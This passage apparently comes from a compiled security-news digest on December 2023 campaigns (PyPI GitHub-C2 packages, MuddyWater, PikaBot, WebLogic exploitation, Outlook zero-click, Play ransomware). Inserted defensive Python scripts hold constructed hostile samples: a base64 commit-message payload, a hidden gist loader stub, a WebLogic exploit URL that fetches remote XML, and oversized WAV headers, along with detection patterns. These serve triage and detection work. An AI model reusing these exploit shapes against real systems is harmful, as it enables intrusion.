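    'u = base64.b64decode("%s").decode()\n'
    'setup(name="libsockexample", version="0.1")\n'
) % base64.b64encode(GIST_URL.encode()).decode()

# Constructed git log, newest first, in the shape easyhttprequest looks for.
SAMPLE_COMMITS = [
    MAGIC + base64.b64encode(b"import os; os.system('id')").decode(),
    "Fix typo in README",
    "Initial import of PySocks fork",
]

B64_LITERAL = re.compile(r'["\']([A-Za-z0-9+/]{16,}={0,2})["\']')
GIST_HOST = re.compile(r"https?://gist\.github(?:usercontent)?\.com/", re.I)


def _decode_text(payload):
    """Base64-decode strictly and return UTF-8 text, or None if it is not a clean text blob."""
    try:
        data = base64.b64decode(payload, validate=True)
        text = data.decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    if not all(c.isprintable() or c.isspace() for c in text):
        return None
    return text


def find_hidden_gist_urls(setup_py_source):
    """Return gist URLs that appear in setup.py only as Base64 string literals."""
    hits = []
    for m in B64_LITERAL.finditer(setup_py_source):
        text = _decode_text(m.group(1))
        if text and GIST_HOST.match(text):
            hits.append(text)
    return hits


def extract_commit_command(message, magic=MAGIC):
    """Mirror the decoding step described above, for triage only: if the commit
    message starts with the magic prefix, strip it and return the decoded payload.
    Returns None for ordinary messages. Never execute the result."""
    if not message.startswith(magic):
        return None
    return _decode_text(message[len(magic):].strip())


def scan_commit_log(messages, magic=MAGIC):
    """Return (index, decoded_payload) for every commit message carrying a payload."""
    found = []
    for i, msg in enumerate(messages):
        cmd = extract_commit_command(msg, magic)
        if cmd is not None:
            found.append((i, cmd))
    return found


if __name__ == "__main__":
    print("gist URLs hidden in setup.py:", find_hidden_gist_urls(SAMPLE_SETUP_PY))
    print("commits carrying payloads:", scan_commit_log(SAMPLE_COMMITS))
```

In practice the commit scan would be fed the output of `git log --format=%B` for the cloned repository, and the setup.py scan run over every package pulled into a build before it is installed; both functions only report, which is the point of triage tooling for this kind of C2 channel.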

All the fraudulent packages have now been taken down from the Python Package Index (PyPI) repository.

"Using GitHub as C2 infrastructure isn't new on its own, but abuse of features like Git Gists and commit messages for command delivery are novel approaches used by malicious actors," Zanki said.


Iranian Hackers Using MuddyC2Go in Telecom Espionage Attacks Across Africa
19.12.23  BigBrothers  The Hacker News

The Iranian nation-state actor known as MuddyWater has leveraged a newly discovered command-and-control (C2) framework called MuddyC2Go in its attacks on the telecommunications sector in Egypt, Sudan, and Tanzania.

The Symantec Threat Hunter Team, part of Broadcom, is tracking the activity under the name Seedworm, which is also tracked under the monikers Boggy Serpens, Cobalt Ulster, Earth Vetala, ITG17, Mango Sandstorm (formerly Mercury), Static Kitten, TEMP.Zagros, and Yellow Nix.

Active since at least 2017, MuddyWater is assessed to be affiliated with Iran's Ministry of Intelligence and Security (MOIS), primarily singling out entities in the Middle East.

The cyber espionage group's use of MuddyC2Go was first highlighted by Deep Instinct last month, describing it as a Golang-based replacement for PhonyC2, itself a successor to MuddyC3. However, there is evidence to suggest that it may have been employed as early as 2020.

While the full extent of MuddyC2Go's capabilities is not yet known, the executable comes fitted with a PowerShell script that automatically connects to Seedworm's C2 server, thereby giving the attackers remote access to a victim system and obviating the need for manual execution by an operator.

The latest set of intrusions, which took place in November 2023, has also been found to rely on SimpleHelp and Venom Proxy, alongside a custom keylogger and other publicly available tools.

Attack chains mounted by the group have a track record of weaponizing phishing emails and known vulnerabilities in unpatched applications for initial access, followed by conducting reconnaissance, lateral movement, and data collection.

In the attacks documented by Symantec targeting an unnamed telecommunications organization, the MuddyC2Go launcher was executed to establish contact with an actor-controlled server, while also deploying legitimate remote access software like AnyDesk and SimpleHelp.

The entity is said to have been previously compromised by the adversary earlier in 2023 in which SimpleHelp was used to launch PowerShell, deliver proxy software, and also install the JumpCloud remote access tool.

"In another telecommunications and media company targeted by the attackers, multiple incidents of SimpleHelp were used to connect to known Seedworm infrastructure," Symantec noted. "A custom build of the Venom Proxy hacktool was also executed on this network, as well as the new custom keylogger used by the attackers in this activity."

By combining bespoke, living-off-the-land, and publicly available tools in its attack chains, the group aims to evade detection for as long as possible in order to meet its strategic objectives, the company said.

"The group continues to innovate and develop its toolset when required in order to keep its activity under the radar," Symantec concluded. "The group still makes heavy use of PowerShell and PowerShell-related tools and scripts, underlining the need for organizations to be aware of suspicious use of PowerShell on their networks."

The development comes as an Israel-linked group called Gonjeshke Darande (meaning "Predatory Sparrow" in Persian) claimed responsibility for a cyber attack that disrupted a "majority of the gas pumps throughout Iran" in response to the "aggression of the Islamic Republic and its proxies in the region."

The group, which reemerged in October 2023 after going quiet for nearly a year, is believed to be linked to the Israeli Military Intelligence Directorate, having conducted destructive attacks in Iran, including steel facilities, petrol stations, and rail networks in the country.


New Malvertising Campaign Distributing PikaBot Disguised as Popular Software
19.12.23  BotNet  The Hacker News

The malware loader known as PikaBot is being distributed as part of a malvertising campaign targeting users searching for legitimate software like AnyDesk.

"PikaBot was previously only distributed via malspam campaigns similarly to QakBot and emerged as one of the preferred payloads for a threat actor known as TA577," Malwarebytes' Jérôme Segura said.

The malware family, which first appeared in early 2023, consists of a loader and a core module that allows it to operate as a backdoor as well as a distributor for other payloads.

This enables the threat actors to gain unauthorized remote access to compromised systems and transmit commands from a command-and-control (C2) server, ranging from arbitrary shellcode, DLLs, or executable files, to other malicious tools such as Cobalt Strike.

One of the threat actors leveraging PikaBot in its attacks is TA577, a prolific cybercrime threat actor that has, in the past, delivered QakBot, IcedID, SystemBC, SmokeLoader, Ursnif, and Cobalt Strike.

Last month, it emerged that PikaBot, along with DarkGate, is being propagated via malspam campaigns that mirror those of QakBot. "Pikabot infection led to Cobalt Strike on 207.246.99[.]159:443 using masterunis[.]net as its domain," Palo Alto Networks Unit 42 disclosed recently.

The latest initial infection vector is a malicious Google ad for AnyDesk that, when clicked by a victim from the search results page, redirects to a fake website named anadesky.ovmv[.]net that points to a malicious MSI installer hosted on Dropbox.

It's worth pointing out that the redirection to the bogus website only occurs after fingerprinting the request, and only if it's not originating from a virtual machine.

"The threat actors are bypassing Google's security checks with a tracking URL via a legitimate marketing platform to redirect to their custom domain behind Cloudflare," Segura explained. "At this point, only clean IP addresses are forwarded to the next step."

Interestingly, a second round of fingerprinting takes place when the victim clicks on the download button on the website, likely in an added attempt to ensure that it's not accessible in a virtualized environment.

Malwarebytes said the attacks are reminiscent of previously identified malvertising chains employed to disseminate another loader malware known as FakeBat (aka EugenLoader).


"This is particularly interesting because it points towards a common process used by different threat actors," Segura said. "Perhaps, this is something akin to 'malvertising-as-a-service' where Google ads and decoy pages are provided to malware distributors."

This disclosure comes as the cybersecurity company said it detected a spike in malicious ads served through Google searches for popular software like Zoom, Advanced IP Scanner, and WinSCP, delivering a previously unseen loader called HiroshimaNukes as well as FakeBat.

"It uses several techniques to bypass detection from DLL side-loading to very large payloads," Segura said. "Its goal is to drop additional malware, typically a stealer followed by data exfiltration."

The rise in malvertising is indicative of how browser-based attacks act as channels for infiltrating target networks. This also includes a new Google Chrome extension framework codenamed ParaSiteSnatcher, which allows threat actors to "monitor, manipulate, and exfiltrate highly sensitive information from multiple sources."

Specifically designed to compromise users in Latin America, the rogue extension is noteworthy for its use of the Chrome Browser API to intercept and exfiltrate all POST requests containing sensitive account and financial information. It's downloaded through a VBScript downloader hosted on Dropbox and Google Cloud and installed onto an infected system.

"Once installed, the extension manifests with the help of extensive permissions enabled through the Chrome extension, allowing it to manipulate web sessions, web requests, and track user interactions across multiple tabs using the Chrome tabs API," Trend Micro said last month.

"The malware includes various components that facilitate its operation, content scripts that enable malicious code injection into web pages, monitor Chrome tabs, and intercept user input and web browser communication."


8220 Gang Exploiting Oracle WebLogic Server Vulnerability to Spread Malware
19.12.23  Virus  The Hacker News

The threat actors associated with the 8220 Gang have been observed exploiting a high-severity flaw in Oracle WebLogic Server to propagate their malware.

The security shortcoming is CVE-2020-14883 (CVSS score: 7.2), a remote code execution bug that could be exploited by authenticated attackers to take over susceptible servers.

"This vulnerability allows remote authenticated attackers to execute code using a gadget chain and is commonly chained with CVE-2020-14882 (an authentication bypass vulnerability also affecting Oracle Weblogic Server) or the use of leaked, stolen, or weak credentials," Imperva said in a report published last week.

The 8220 Gang has a history of leveraging known security flaws to distribute cryptojacking malware. Earlier this May, the group was spotted utilizing another shortcoming in Oracle WebLogic servers (CVE-2017-3506, CVSS score: 7.4) to rope the devices into a crypto mining botnet.

Recent attack chains documented by Imperva entail the exploitation of CVE-2020-14883 to make the server load specially crafted XML files, ultimately running code that deploys stealer and coin mining malware such as Agent Tesla, rhajk, and nasqa.
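As an added example (not Imperva's detection logic), the following triage script runs over constructed access log lines and flags the request shapes used in public CVE-2020-14882/14883 exploitation: the double-URL-encoded traversal to console.portal and the known gadget class names passed in the handle= parameter, plus POSTs to the wls-wsat endpoint targeted by the older XMLDecoder flaws (CVE-2017-3506 and its bypass CVE-2017-10271). The IP addresses and timestamps are made up.

```python
import re
from urllib.parse import unquote

# Constructed access log lines (made-up addresses and timestamps), added here as
# an example; they are not from Imperva's report. Line 2 has the shape of the
# public CVE-2020-14882/14883 exploit chain, line 3 targets the wls-wsat
# endpoint associated with the older XMLDecoder bugs (CVE-2017-3506/10271).
SAMPLE_ACCESS_LOG = """\
203.0.113.10 - - [12/Dec/2023:10:01:02 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 5123
203.0.113.11 - - [12/Dec/2023:10:02:45 +0000] "GET /console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext(%22http://203.0.113.99/poc.xml%22) HTTP/1.1" 200 1231
198.51.100.7 - - [12/Dec/2023:10:03:10 +0000] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 500 412
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Gadget classes named in public exploits for CVE-2020-14883.
GADGETS = (
    "com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext",
    "com.tangosol.coherence.mvel2.sh.ShellSession",
)


def decode_twice(s):
    """Exploits double-URL-encode the traversal so the console's own filter misses it."""
    return unquote(unquote(s))


def classify_request(method, url):
    """Return a list of reasons a request looks like WebLogic exploitation (empty if clean)."""
    path, _, query = url.partition("?")
    dpath = decode_twice(path)
    dquery = decode_twice(query)
    reasons = []
    if dpath.startswith("/console/") and "/../" in dpath and dpath.endswith("console.portal"):
        reasons.append("CVE-2020-14882: double-encoded traversal to console.portal (auth bypass)")
    if "handle=" in dquery and any(g in dquery for g in GADGETS):
        reasons.append("CVE-2020-14883: known gadget class passed in handle= parameter")
    if method.upper() == "POST" and dpath.startswith("/wls-wsat/"):
        reasons.append("wls-wsat XMLDecoder endpoint (CVE-2017-3506 / CVE-2017-10271 family)")
    return reasons


def scan_access_log(log_text):
    """Return (ip, url, reasons) for every parseable line that trips a rule."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        reasons = classify_request(m["method"], m["url"])
        if reasons:
            hits.append((m["ip"], m["url"], reasons))
    return hits


if __name__ == "__main__":
    for ip, url, reasons in scan_access_log(SAMPLE_ACCESS_LOG):
        print(ip, url[:60], reasons)
```

The decode-twice step matters: a rule that only decodes once sees `%2e%2e%2f` and never matches `../`, which is exactly why the public exploit encodes the traversal twice. A 200 response to the console.portal request on an unpatched server is the strongest signal; the wls-wsat rule is noisier and should be paired with the response body or status.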


"The group appears to be opportunistic when selecting their targets, with no clear trend in country or industry," Imperva security researcher Daniel Johnston said.

Targets of the campaign include healthcare, telecommunications, and financial services sectors in the U.S., South Africa, Spain, Colombia, and Mexico.

"The group relies on simple, publicly available exploits to target well-known vulnerabilities and exploit easy targets to achieve their objectives," Johnston added. "While considered unsophisticated, they are constantly evolving their tactics and techniques to evade detection."


Rhadamanthys Malware: Swiss Army Knife of Information Stealers Emerges
19.12.23  Virus  The Hacker News

The developers of the information stealer malware known as Rhadamanthys are actively iterating on its features, broadening its information-gathering capabilities and also incorporating a plugin system to make it more customizable.

This approach not only turns it into a threat capable of meeting "specific distributor needs," but also makes it more potent, Check Point said in a technical deep dive published last week.

Rhadamanthys, first documented by ThreatMon in October 2022, has been sold under the malware-as-a-service (MaaS) model since as early as September 2022 by an actor under the alias "kingcrete2022."

Typically distributed through malicious websites mirroring those of genuine software that are advertised through Google ads, the malware is capable of harvesting a wide range of sensitive information from compromised hosts, including from web browsers, crypto wallets, email clients, VPN, and instant messaging apps.

"Rhadamanthys represents a step in the emerging tradition of malware that tries to do as much as possible, and also a demonstration that in the malware business, having a strong brand is everything," the Israeli cybersecurity firm noted in March 2023.

A subsequent investigation into the off-the-shelf malware in August 2023 revealed "design and implementation" overlap with that of the Hidden Bee coin miner.

"The similarity is apparent at many levels: custom executable formats, the use of similar virtual filesystems, identical paths to some of the components, reused functions, similar use of steganography, use of LUA scripts, and overall analogous design," the researchers said, describing the malware's development as "fast-paced and ongoing."

As of writing, the current working version of Rhadamanthys is 0.5.2, per the description on the threat actor's Telegram channel.

Check Point's analysis of versions 0.5.0 and 0.5.1 reveals a new plugin system that effectively makes it more of a Swiss Army knife, indicating a shift towards modularization and customization. This also allows the stealer customers to deploy additional tools tailored to their targets.

The stealer components come in two kinds: active ones, which open processes and inject additional payloads designed to facilitate information theft, and passive ones, which search for and parse specific files to retrieve saved credentials.

Another noticeable aspect is the use of a Lua script runner that can load up to 100 Lua scripts to pilfer as much information as possible from cryptocurrency wallets, email agents, FTP services, note-taking apps, instant messengers, VPNs, two-factor authentication apps, and password managers.

Version 0.5.1 goes a step further, adding clipper functionality to alter clipboard data matching wallet addresses to divert cryptocurrency payments to an attacker-controlled wallet as well as an option to recover Google Account cookies, following the footsteps of Lumma Stealer.

"The author keeps enriching the set of available features, trying to make it not only a stealer but a multipurpose bot, by enabling it to load multiple extensions created by a distributor," security researcher Aleksandra "Hasherezade" Doniec said.

"The added features, such as a keylogger, and collecting information about the system, are also a step towards making it a general-purpose spyware."

AsyncRAT's Code Injection into aspnet_compiler.exe
The findings come as Trend Micro detailed new AsyncRAT infection chains that leverage a legitimate Microsoft process called aspnet_compiler.exe, which is used for precompiling ASP.NET web applications, to stealthily deploy the remote access trojan (RAT) via phishing attacks.

Similar to how Rhadamanthys carries out code injection into running processes, the multi-stage process culminates in the AsyncRAT payload being injected into a newly spawned aspnet_compiler.exe process to ultimately establish contact with a command-and-control (C2) server.

"The AsyncRAT backdoor has other capabilities depending on the embedded configuration," security researchers Buddy Tancio, Fe Cureg, and Maria Emreen Viray said. "This includes anti-debugging and analysis checks, persistence installation, and keylogging."

It's also designed to scan particular folders within the application directory, browser extensions, and user data to check for the presence of crypto wallets. On top of that, the threat actors have been observed relying on Dynamic DNS (DDNS) to deliberately obfuscate their activities.

"The use of dynamic host servers allows threat actors to seamlessly update their IP addresses, strengthening their ability to remain undetected within the system," the researchers said.


QakBot Malware Resurfaces with New Tactics, Targeting the Hospitality Industry
19.12.23  Virus  The Hacker News

A new wave of phishing messages distributing the QakBot malware has been observed, more than three months after a law enforcement effort saw its infrastructure dismantled by infiltrating its command-and-control (C2) network.

Microsoft, which made the discovery, described it as a low-volume campaign that began on December 11, 2023, and targeted the hospitality industry.

"Targets received a PDF from a user masquerading as an IRS employee," the tech giant said in a series of posts shared on X (formerly Twitter).

"The PDF contained a URL that downloads a digitally signed Windows Installer (.msi). Executing the MSI led to Qakbot being invoked using export 'hvsi' execution of an embedded DLL."

Microsoft said that the payload was generated the same day the campaign started and that it's configured with the previously unseen version 0x500.

Zscaler ThreatLabz, in a post shared on X, described the resurfaced QakBot as a 64-bit binary that utilizes AES for network encryption and sends POST requests to the path /teorema505.

QakBot, also called QBot and Pinkslipbot, was disrupted as part of a coordinated effort called Operation Duck Hunt after the authorities managed to gain access to its infrastructure and instructed the infected computers to download an uninstaller file to render the malware ineffective.


Traditionally distributed via spam email messages containing malicious attachments or hyperlinks, QakBot is capable of harvesting sensitive information as well as delivering additional malware, including ransomware.

In October 2023, Cisco Talos revealed that QakBot affiliates were leveraging phishing lures to deliver a mix of ransomware, remote access trojans, and stealer malware.

The return of QakBot mirrors that of Emotet, which also resurfaced in late 2021 months after it was dismantled by law enforcement and has remained an enduring threat, albeit at a lower level.

While it remains to be seen if the malware will return to its former glory, the resilience of such botnets underscores the need for organizations to avoid falling victim to spam emails used in Emotet and QakBot campaigns.


Double-Extortion Play Ransomware Strikes 300 Organizations Worldwide
19.12.23  Ransom  The Hacker News

The threat actors behind the Play ransomware are estimated to have impacted approximately 300 entities as of October 2023, according to a new joint cybersecurity advisory from Australia and the U.S.

"Play ransomware actors employ a double-extortion model, encrypting systems after exfiltrating data and have impacted a wide range of businesses and critical infrastructure organizations in North America, South America, Europe, and Australia," authorities said.

Also called Balloonfly and PlayCrypt, Play emerged in 2022, exploiting security flaws in Microsoft Exchange servers (CVE-2022-41040 and CVE-2022-41082) and Fortinet appliances (CVE-2018-13379 and CVE-2020-12812) to breach enterprises and deploy file-encrypting malware.

It's worth pointing out that ransomware attacks are increasingly exploiting vulnerabilities rather than using phishing emails as initial infection vectors, jumping from nearly zero in the second half of 2022 to almost a third in the first half of 2023, per data from Corvus.

Cybersecurity firm Adlumin, in a report published last month, revealed that Play is being offered to other threat actors "as a service," completing its transformation into a ransomware-as-a-service (RaaS) operation.

Ransomware attacks orchestrated by the group are characterized by the use of public and bespoke tools like AdFind to run Active Directory queries, GMER, IOBit, and PowerTool to disable antivirus software, and Grixba to enumerate network information and for collecting information about backup software and remote administration tools installed on a machine.

The threat actors have also been observed to carry out lateral movement and data exfiltration and encryption steps, banking on Cobalt Strike, SystemBC, and Mimikatz for post-exploitation.

"The Play ransomware group uses a double-extortion model, encrypting systems after exfiltrating data," the agencies said. "Ransom notes do not include an initial ransom demand or payment instructions, rather, victims are instructed to contact the threat actors via email."

According to statistics compiled by Malwarebytes, Play is said to have claimed nearly 40 victims in November 2023 alone, but significantly trailing behind its peers LockBit and BlackCat (aka ALPHV and Noberus).

The alert comes days after U.S. government agencies released an updated bulletin about the Karakurt group, which is known to eschew encryption-based attacks in favor of pure extortion after obtaining initial access to networks via purchasing stolen login credentials, intrusion brokers (aka initial access brokers), phishing, and known security flaws.

"Karakurt victims have not reported encryption of compromised machines or files; rather, Karakurt actors have claimed to steal data and threatened to auction it off or release it to the public unless they receive payment of the demanded ransom," the government said.

The developments also come amid speculations that the BlackCat ransomware may have been a target of a law enforcement operation after its dark web leak portals went offline for five days. However, the e-crime collective pinned the outage on a hardware failure.

What's more, another nascent ransomware group known as NoEscape is alleged to have pulled an exit scam, effectively "stealing the ransom payments and closing down the group's web panels and data leak sites," prompting other gangs like LockBit to recruit their former affiliates.

That the ransomware landscape is constantly evolving and shifting, whether or not due to external pressure from law enforcement, is hardly surprising. This is further evidenced by the collaboration between the BianLian, White Rabbit, and Mario ransomware gangs in a joint extortion campaign targeting publicly traded financial services firms.

"These cooperative ransom campaigns are rare, but are possibly becoming more common due to the involvement of initial access brokers (IABs) collaborating with multiple groups on the dark web," Resecurity said in a report published last week.

"Another factor that may be leading to greater collaboration are law enforcement interventions that create cybercriminal diaspora networks. Displaced participants of these threat actor networks may be more willing to collaborate with rivals."


Beware: Experts Reveal New Details on Zero-Click Outlook RCE Exploits
19.12.23  Exploit  The Hacker News

Technical details have emerged about two now-patched security flaws in Microsoft Windows that could be chained by threat actors to achieve remote code execution against the Outlook email client without any user interaction.

"An attacker on the internet can chain the vulnerabilities together to create a full, zero-click remote code execution (RCE) exploit against Outlook clients," Akamai security researcher Ben Barnea, who discovered the vulnerabilities, said in a two-part report shared with The Hacker News.

The security issues, which were addressed by Microsoft in August and October 2023, respectively, are listed below -

CVE-2023-35384 (CVSS score: 5.4) - Windows HTML Platforms Security Feature Bypass Vulnerability
CVE-2023-36710 (CVSS score: 7.8) - Windows Media Foundation Core Remote Code Execution Vulnerability

CVE-2023-35384 has been described by Akamai as a bypass for a critical security flaw that Microsoft patched in March 2023. Tracked as CVE-2023-23397 (CVSS score: 9.8), the flaw relates to a case of privilege escalation that could result in the theft of NTLM credentials and enable an attacker to conduct a relay attack.

Earlier this month, Microsoft, Proofpoint, and Palo Alto Networks Unit 42 revealed that a Russian threat actor known as APT28 (aka Forest Blizzard) has been actively weaponizing the bug to gain unauthorized access to victims' accounts within Exchange servers.

It's worth noting that CVE-2023-35384 is also the second patch bypass after CVE-2023-29324, which was also discovered by Barnea and subsequently remediated by Redmond as part of May 2023 security updates.

"We found another bypass to the original Outlook vulnerability — a bypass that once again allowed us to coerce the client to connect to an attacker-controlled server and download a malicious sound file," Barnea said.

CVE-2023-35384, like CVE-2023-29324, is rooted in the parsing of a path by the MapUrlToZone function that could be exploited by sending an email containing a malicious file or a URL to an Outlook client.

"A security feature bypass vulnerability exists when the MSHTML platform fails to validate the correct Security Zone of requests for specific URLs. This could allow an attacker to cause a user to access a URL in a less restricted Internet Security Zone than intended," Microsoft noted in its advisory.

In doing so, the vulnerability can not only be used to leak NTLM credentials, but can also be chained with the sound parsing flaw (CVE-2023-36710) to download a custom sound file that, when autoplayed using Outlook's reminder sound feature, can lead to a zero-click code execution on the victim machine.

CVE-2023-36710 impacts the Audio Compression Manager (ACM) component, a legacy Windows multimedia framework that's used to manage audio codecs, and is the result of an integer overflow vulnerability that occurs when playing a WAV file.

"Finally, we managed to trigger the vulnerability using the IMA ADP codec," Barnea explained. "The file size is approximately 1.8 GB. By performing the math limit operation on the calculation we can conclude that the smallest possible file size with IMA ADP codec is 1 GB."
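The following header parser is an added example, not Akamai's code or exploit: it reads only the RIFF/WAVE chunk headers and applies a triage heuristic derived from the quote above, flagging files whose fmt chunk carries the IMA ADPCM format tag (0x0011, the standard WAVE_FORMAT_IMA_ADPCM value) and whose data chunk declares at least 1 GB. The threshold and the sample headers are constructed for illustration; a declared size is a hint for mail-gateway triage of attachments, not proof of exploitation.

```python
import struct

# Added example; not Akamai's detection logic or exploit. It only reads the
# RIFF/WAVE chunk headers and applies a triage heuristic: the IMA ADPCM format
# tag plus a declared data size at or above the ~1 GB floor quoted above.
WAVE_FORMAT_IMA_ADPCM = 0x0011   # standard format tag for IMA/DVI ADPCM
WAVE_FORMAT_PCM = 0x0001
ONE_GIB = 1 << 30


def parse_wav_header(blob):
    """Return (format_tag, channels, sample_rate, declared_data_size).

    Walks the chunk list up to the 'data' chunk header and stops, so it never
    needs the sample data itself; a header-only (truncated) file parses fine.
    """
    if len(blob) < 12 or blob[:4] != b"RIFF" or blob[8:12] != b"WAVE":
        raise ValueError("not a RIFF/WAVE file")
    pos, fmt, data_size = 12, None, None
    while pos + 8 <= len(blob):
        cid, size = struct.unpack_from("<4sI", blob, pos)
        body = pos + 8
        if cid == b"fmt ":
            if size < 8 or body + 8 > len(blob):
                raise ValueError("truncated fmt chunk")
            fmt = struct.unpack_from("<HHI", blob, body)  # wFormatTag, nChannels, nSamplesPerSec
        elif cid == b"data":
            data_size = size
            break
        pos = body + size + (size & 1)  # chunks are word aligned
    if fmt is None or data_size is None:
        raise ValueError("missing fmt or data chunk")
    return fmt + (data_size,)


def is_suspicious_reminder_sound(blob, floor=ONE_GIB):
    """Heuristic: IMA ADPCM plus a declared payload at or above the 1 GB floor."""
    tag, _channels, _rate, data_size = parse_wav_header(blob)
    return tag == WAVE_FORMAT_IMA_ADPCM and data_size >= floor


def make_wav_header(tag, data_size, channels=1, rate=8000):
    """Build a constructed header that declares data_size bytes without carrying them."""
    block_align = channels * 2
    fmt_body = struct.pack("<HHIIHH", tag, channels, rate, rate * block_align, block_align, 16)
    fmt_chunk = b"fmt " + struct.pack("<I", len(fmt_body)) + fmt_body
    data_chunk = b"data" + struct.pack("<I", data_size)
    riff_size = (4 + len(fmt_chunk) + len(data_chunk) + data_size) & 0xFFFFFFFF
    return b"RIFF" + struct.pack("<I", riff_size) + b"WAVE" + fmt_chunk + data_chunk


# Constructed samples: an ordinary short PCM clip and a header that declares
# roughly 1.8 GB of IMA ADPCM data, the size range quoted above.
BENIGN_PCM = make_wav_header(WAVE_FORMAT_PCM, 16000) + bytes(16000)
HUGE_IMA = make_wav_header(WAVE_FORMAT_IMA_ADPCM, 0x7000_0000)

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN_PCM), ("huge IMA ADPCM", HUGE_IMA)):
        print(name, parse_wav_header(blob), "suspicious:", is_suspicious_reminder_sound(blob))
```

Because the parser stops at the data chunk header, it can be run on the first few hundred bytes of an attachment or of a file a client has been coerced into fetching; the rest of the payload is never read, which keeps the check cheap even for files that really are gigabytes long.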

To mitigate the risks, organizations are advised to use microsegmentation to block outgoing SMB connections to remote public IP addresses. It is also advised to either disable NTLM, or add users to the Protected Users security group, which prevents the use of NTLM as an authentication mechanism.


Four U.S. Nationals Charged in $80 Million Pig Butchering Crypto Scam
19.12.23  Cryptocurrency  The Hacker News

Four U.S. nationals have been charged for participating in an illicit scheme that earned them more than $80 million via cryptocurrency investment scams.

The defendants – Lu Zhang, 36, of Alhambra, California; Justin Walker, 31, of Cypress, California; Joseph Wong, 32, of Rosemead, California; and Hailong Zhu, 40, of Naperville, Illinois – have been charged with conspiracy to commit money laundering, concealment money laundering, and international money laundering.

The U.S. Department of Justice (DoJ), which announced the arrests of both Zhang and Walker in connection with the fraudulent operation, said the quartet opened shell companies and bank accounts to carry out pig butchering scams, transferring the ill-gotten funds to domestic and international financial entities.

If convicted, Zhang and Walker face a maximum penalty of 20 years in prison. Their alleged co-conspirators remain at large.

"The overall fraud scheme in the related pig-butchering syndicate involved at least 284 transactions and resulted in more than $80 million in victim losses," the DoJ said. "More than $20 million in victim funds were directly deposited into bank accounts associated with the defendants."

The enforcement action comes as a Nigerian national named Eze Harrison Arinze was sentenced to three years in prison for his role in conducting pig butchering scams and defrauding 34 victims in 13 countries, leading to $592,000 in losses.

Late last month, the U.S. DoJ also announced the seizure of nearly $9 million worth of Tether that were traced to cryptocurrency addresses allegedly associated with a Southeast Asia based organization that exploited over 70 victims through pig butchering scams.

Pig butchering falls under the category of so-called romance-investment scams, wherein people are targeted via dating apps under fictitious identities to gain their trust and dupe them into investing their money in seemingly legitimate and profitable ventures, typically promising high investment returns within a short span of time.


"After persuading the victim to invest, the scammers collect the funds, often using digital payment platforms or cryptocurrencies to make tracking more difficult," Trend Micro said in a report detailing the scam.

"Once they have received a substantial sum from their victims, or once the victims try to withdraw funds from the account, the scammers will suddenly become unreachable, or the brokerage platform will have trouble transferring funds. Scammers could also delete their online presence or create new identities, making it difficult for victims to recover their lost funds."

One of the emerging trends in the space involves the use of group chats, indicating that the cyber criminals are adapting and refining their strategies to make them more effective.

In these cases, prospective victims are added to a fake investment chat group under their control. Should the target express interest in investing in cryptocurrencies, the conversation is moved to a one-to-one chat, where they are introduced to a bogus brokerage platform and persuaded to transfer their funds to the service.

According to the Federal Bureau of Investigation's (FBI) Internet Crime Complaint Center (IC3) report, cryptocurrency investment scams have led to unprecedented losses totaling $2.57 billion in 2022, registering a 183% increase from 2021.

"A significant portion of these phone numbers can be traced back to leaked databases containing personal information," the cybersecurity firm said. "More than half of the numbers added to the fake group chats have been found in such databases, indicating that scammers could be using leaked information to find their next victims."


CISA Urges Manufacturers to Eliminate Default Passwords to Thwart Cyber Threats
19.12.23  BigBrothers  The Hacker News

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is urging manufacturers to get rid of default passwords on internet-exposed systems altogether, citing severe risks that could be exploited by malicious actors to gain initial access to, and move laterally within, organizations.

In an alert published last week, the agency called out Iranian threat actors affiliated with the Islamic Revolutionary Guard Corps (IRGC) for exploiting operational technology devices with default passwords to gain access to critical infrastructure systems in the U.S.

Default passwords refer to factory default software configurations for embedded systems, devices, and appliances that are typically publicly documented and identical among all systems within a vendor's product line.

As a result, threat actors could scan for internet-exposed endpoints using tools like Shodan and attempt to breach them through default passwords, often gaining root or administrative privileges to perform post-exploitation actions depending on the type of the system.

"Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary," MITRE notes.

Earlier this month, CISA revealed that IRGC-affiliated cyber actors using the persona Cyber Av3ngers are actively targeting and compromising internet-exposed, Israeli-made Unitronics Vision Series programmable logic controllers (PLCs) by using the default password ("1111").

"In these attacks, the default password was widely known and publicized on open forums where threat actors are known to mine intelligence for use in breaching U.S. systems," the agency added.


As mitigation measures, manufacturers are being urged to follow secure by design principles and provide unique setup passwords with the product, or alternatively disable such passwords after a preset time period and require users to enable phishing-resistant multi-factor authentication (MFA) methods.

The agency further advised vendors to conduct field tests to determine how their customers are deploying the products within their environments and if they involve the use of any unsafe mechanisms.

"Analysis of these field tests will help bridge the gap between developer expectations and actual customer usage of the product," CISA noted in its guidance.


"It will also help identify ways to build the product so customers will be most likely to securely use it—manufacturers should ensure that the easiest route is the secure one."

The disclosure comes as the Israel National Cyber Directorate (INCD) attributed a Lebanese threat actor with connections to the Iranian Ministry of Intelligence for orchestrating cyber attacks targeting critical infrastructure in the country amidst its ongoing war with Hamas since October 2023.

The attacks, which involve the exploitation of known security flaws (e.g., CVE-2018-13379) to obtain sensitive information and deploy destructive malware, have been tied to an attack group named Plaid Rain (formerly Polonium).

The development also follows the release of a new advisory from CISA that outlines security countermeasures for healthcare and critical infrastructure entities to fortify their networks against potential malicious activity and reduce the likelihood of domain compromise -

Enforce strong passwords and phishing-resistant MFA
Ensure that only ports, protocols, and services with validated business needs are running on each system
Configure Service accounts with only the permissions necessary for the services they operate
Change all default passwords for applications, operating systems, routers, firewalls, wireless access points, and other systems
Discontinue reuse or sharing of administrative credentials among user/administrative accounts
Mandate consistent patch management
Implement network segregation controls
Evaluate the use of unsupported hardware and software and discontinue where possible
Encrypt personally identifiable information (PII) and other sensitive data
